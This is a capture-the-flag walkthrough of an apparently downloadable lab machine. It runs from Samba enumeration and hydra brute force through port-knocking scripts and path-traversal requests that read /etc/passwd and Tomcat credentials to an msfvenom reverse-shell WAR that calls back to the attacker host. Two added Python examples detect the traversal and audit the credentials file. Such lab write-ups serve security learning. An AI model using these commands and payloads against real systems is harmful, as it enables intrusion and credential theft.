For personal entertainment only
Target machine information
Download link: https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download
I. Host discovery
II. Information gathering
22/tcp   filtered ssh
53/tcp   open     domain
80/tcp   filtered http
110/tcp  open     pop3?
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open     imap        Dovecot imapd
445/tcp  open     netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open     ssl/imap    Dovecot imapd
995/tcp  open     ssl/pop3s?
8080/tcp open     http        Apache Tomcat/Coyote JSP engine 1.1
Port 8080 serves the Tomcat default page; the /manager/ console cannot be logged into.
III. Vulnerability discovery and exploitation
1. Attacking the Samba service
Enumerate the usernames exposed by the Samba service.
enum4linux -U 192.168.174.130
Usernames found: qiu or pleadformercy
Try mounting the share remotely
mkdir /mnt/file
mount -t cifs //192.168.174.130/qiu /mnt/file
hydra -L 1.txt -P 2.txt smb://192.168.174.130 -s 139
Log in with the recovered account credentials
smbclient //192.168.174.130/qiu -U qiu
Knock sequences that make the port-knocking daemon open the filtered firewall ports; each sequence is sent by probing the listed ports in order.
#!/bin/bash
# Knock sequence 1: probe each port in order; the knock daemon watches for exactly this order.
for PORT in 159 27391 4; do
    nmap -Pn 192.168.174.130 -p "$PORT"
done
#!/bin/bash
# Knock sequence 2: second port set, sent the same way.
for PORT in 17301 28504 9999; do
    nmap -Pn 192.168.174.130 -p "$PORT"
done
Port 80 is now open.
The PoC (a path traversal through the file parameter) is:
http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/passwd
For the Tomcat service on port 8080, the user configuration lives in /etc/tomcat7/tomcat-users.xml, which the same traversal can read:
http://192.168.174.130/nomercy//windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml
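Added example, not code from the write-up or the target: a Python resolver that shows why the file= parameter above walks out of the document root, written in the hardened form the application should have used, plus a detector run over constructed Apache access-log lines. The document root /var/www/html/nomercy/windows and the log lines are assumptions made for the example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed document root of the vulnerable app (hypothetical path; the write-up does not give it).
WEB_ROOT = "/var/www/html/nomercy/windows"

# Apache combined-format prefix: client, ident, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed access-log lines modelled on the requests seen in the write-up.
SAMPLE_ACCESS_LOG = [
    '192.168.174.128 - - [01/Jan/2020:10:00:01 +0000] "GET /nomercy//windows/code.php?file=about.php HTTP/1.1" 200 512',
    '192.168.174.128 - - [01/Jan/2020:10:00:02 +0000] "GET /nomercy//windows/code.php?file=../../../../../../etc/passwd HTTP/1.1" 200 2326',
    '192.168.174.128 - - [01/Jan/2020:10:00:03 +0000] "GET /nomercy//windows/code.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2ftomcat7%2ftomcat-users.xml HTTP/1.1" 200 1190',
    '192.168.174.128 - - [01/Jan/2020:10:00:04 +0000] "GET /nomercy//windows/code.php?file=%252e%252e%252fconfig.php HTTP/1.1" 200 300',
    '192.168.174.128 - - [01/Jan/2020:10:00:05 +0000] "GET /nomercy/ HTTP/1.1" 200 1024',
]


def resolve_include(web_root, file_param):
    """Return the normalised path an include would open, or None when it escapes web_root.

    This is the hardened form of the unchecked include behind code.php?file=:
    join the parameter onto the document root, normalise every '..' away, and
    refuse anything that no longer sits under the root. An absolute parameter
    is refused as well, because posixpath.join discards the root when given one.
    In production also resolve with os.path.realpath so a symlink cannot carry
    the path outside the root.
    """
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, file_param))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def traversal_hits(log_lines):
    """Return (client ip, decoded file parameter, status) for every request whose
    file= parameter would resolve outside WEB_ROOT."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes once; decoding once more surfaces double-encoded
        # %252e%252e%252f, an evasion attempt worth flagging even though PHP itself
        # would only decode it once.
        for raw in parse_qs(query, keep_blank_values=True).get("file", []):
            decoded = unquote(raw)
            if resolve_include(WEB_ROOT, decoded) is None:
                hits.append((m.group("ip"), decoded, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for ip, path, status in traversal_hits(SAMPLE_ACCESS_LOG):
        print(f"{ip} traversal via file={path!r} (HTTP {status})")
```

The resolver check is the fix: normalising and then insisting the result stays under the root is what code.php lacked. A status of 200 on a flagged line means the read succeeded, so such lines deserve priority over 404s when triaging.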
The account credentials obtained:
<user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
<user username="fluffy" password="freakishfluffybunny" roles="none"/>
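Added example, not part of the write-up: a small Python audit of tomcat-users.xml that flags exactly the two weaknesses the recovered entries show, plaintext passwords and accounts holding roles that can deploy applications through the manager. The two user entries are the ones recovered above; the surrounding root element, the hardened counterpart file, and the "looks hashed" heuristic are assumptions made for the example.

```python
import re
import xml.etree.ElementTree as ET

# The two <user> entries recovered from the target's /etc/tomcat7/tomcat-users.xml,
# placed inside the file's normal root element (the wrapper is constructed here).
TOMCAT_USERS_XML = """<tomcat-users>
  <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
  <user username="fluffy" password="freakishfluffybunny" roles="none"/>
</tomcat-users>
"""

# Constructed hardened counterpart: Tomcat's XML namespace on the root, only the
# read-only status role, and a salted digest instead of a plaintext password
# (the hex values are placeholders, not real credentials).
HARDENED_TOMCAT_USERS_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-status"/>
  <user username="monitor" password="0123456789abcdef$100000$%s" roles="manager-status"/>
</tomcat-users>
""" % ("ab" * 32)

# Roles that let a holder deploy or reconfigure applications via the manager or host-manager,
# which is what uploading a WAR as in the write-up requires. manager-status is read-only.
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}

# Heuristic (assumption): a stored credential counts as hashed only if it looks like
# Tomcat's salted digest form (saltHex$iterations$hashHex) or a bare MD5/SHA-1/SHA-256 hex digest.
HASHED_RE = re.compile(
    r"^(?:[0-9a-f]+\$\d+\$[0-9a-f]+|[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$", re.I
)


def _local(tag):
    """Strip an XML namespace: '{http://tomcat.apache.org/xml}user' -> 'user'."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, finding) pairs for plaintext credentials and deploy-capable roles."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        # Tomcat accepts both 'username' and the older 'name' attribute.
        name = el.get("username") or el.get("name") or "?"
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if password and not HASHED_RE.match(password):
            findings.append((name, "plaintext-password"))
        deploy = sorted(roles & DEPLOY_ROLES)
        if deploy:
            findings.append((name, "deploy-capable-roles:" + ",".join(deploy)))
    return findings


if __name__ == "__main__":
    for name, finding in audit_tomcat_users(TOMCAT_USERS_XML):
        print(f"{name}: {finding}")
    print("hardened file findings:", audit_tomcat_users(HARDENED_TOMCAT_USERS_XML))
```

The first finding is why the traversal above was enough on its own: with the file readable and the password stored in clear, no cracking step was needed. Restricting the file's permissions to the tomcat user and storing digests removes both halves of that chain.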
Generate a reverse-shell WAR package with msfvenom
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.174.128 LPORT=4444 -f war -o shell1.war
Inspect the contents of the WAR package with 7z
7z l shell1.war
The generated JSP is named wviikccgyjggh.jsp
Visit http://192.168.174.130:8080/shell1/wviikccgyjggh.jsp
python -c 'import pty;pty.spawn("/bin/bash")'
Information gathering
Switch to the other account and log in
<user username="fluffy" password="freakishfluffybunny" roles="none"/>